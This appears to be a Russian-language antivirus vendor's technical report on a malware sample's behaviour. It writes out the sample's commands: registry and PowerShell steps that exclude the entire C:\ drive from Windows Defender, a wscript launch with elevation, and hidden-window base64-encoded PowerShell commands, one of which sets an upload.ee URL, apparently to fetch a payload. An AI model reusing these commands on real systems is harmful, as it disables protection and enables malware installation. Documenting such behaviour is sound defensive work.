Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра:
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] 'C:\' = ''
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Add-MpPreference -ExclusionPath " C:\
Другое
Запускает на исполнение
- '<SYSTEM32>\wscript.exe' "<PATH_SAMPLE>.js" /elevate
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQ... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHUAcABsAG8AYQBkAC4AZQBlAC8AZABvAHcAbgBsAG8AYQBkAC8AMQA3ADkAMAA2ADgAOQA5AC8AZQA1AGIANwBjADgAYgBmADMAMABkADEAMgAwADYAZAAxADgAMAA5AC8AWABD... (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
